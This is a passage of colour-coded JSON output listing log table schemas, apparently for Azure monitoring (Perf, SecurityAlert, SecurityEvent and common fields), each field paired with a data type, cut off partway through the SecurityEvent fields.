\u001b[94m\"Perf\"\u001b[39;49;00m: {\n        \u001b[94m\"BucketEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"BucketStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CounterValue\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Max\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Min\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SampleCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StandardDeviation\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ReservedAzureCommonFields\"\u001b[39;49;00m: {\n        \u001b[94m\"Caller_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIP_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientInfo_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientPort_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Direction_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailedRequestCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HealthyHostCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpMethod_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HttpStatusCode_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpStatus_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"HttpVersion_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Id_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JobId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Latency_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MacAddress_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MatchedConnections_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Priority_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ReceivedBytes_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RequestCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RequestQuery_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestUri_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RuleName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RunbookName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SentBytes_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SslEnabled_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StreamType_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubnetPrefix_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Throughput_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeTaken_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UnHealthyHostCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VnetResourceGuid_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ReservedCommonFields\"\u001b[39;49;00m: {\n        \u001b[94m\"CallerIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SecurityAlert\"\u001b[39;49;00m: {\n        \u001b[94m\"AlertName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceScore\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Entities\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedLinks\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsIncident\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessingEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ProductComponentName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProductName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationSteps\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SystemAlertId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorOriginalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkspaceResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkspaceSubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SecurityEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"AccessMask\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Account\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountExpires\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountSessionIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Activity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInfo2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AllowedToDelegateTo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Attributes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditPolicyChanges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditsDiscarded\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationLevel\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationService\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CACertificateHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CAPublicKeyHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CalledStationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallingStationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertificateDatabaseHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Channel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClassId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClassName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CommandLine\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CompatibleIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DCDNSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Disposition\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainBehaviorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainPolicyChanged\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EAPType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevatedToken\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedQuarantineState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePathNoUser\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Filter\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForceLogoff\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Fqbn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FullyQualifiedSubjectMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FullyQualifiedSubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupMembership\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HandleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HardwareIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomeDirectory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InterfaceUuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeyLength\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LmPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LocationInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutDuration\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutObservationWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutThreshold\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoggingResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonHours\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LogonTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineAccountQuota\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineInventory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineLogon\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MandatoryLabel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaxPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MixedDomainMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIPv4Address\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIPv6Address\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASPortType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkPolicyName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewDate\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewMaxUsers\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewRemark\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewShareFlags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewValueType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectValueName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OemInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldMaxUsers\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldRemark\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldShareFlags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldValueType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ParentProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordHistoryLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordLastSet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreviousDate\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreviousTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrimaryGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivateKeyUsageCount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Process\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProtocolSequence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProxyPolicyName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineHelpURL\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSessionID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSessionIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSystemHealthResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RelativeTargetName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemotePort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Requester\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RestrictedAdminMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RowsDeleted\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SamAccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScriptPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SecurityDescriptor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceStartType\"\u001b[39;49;00m: 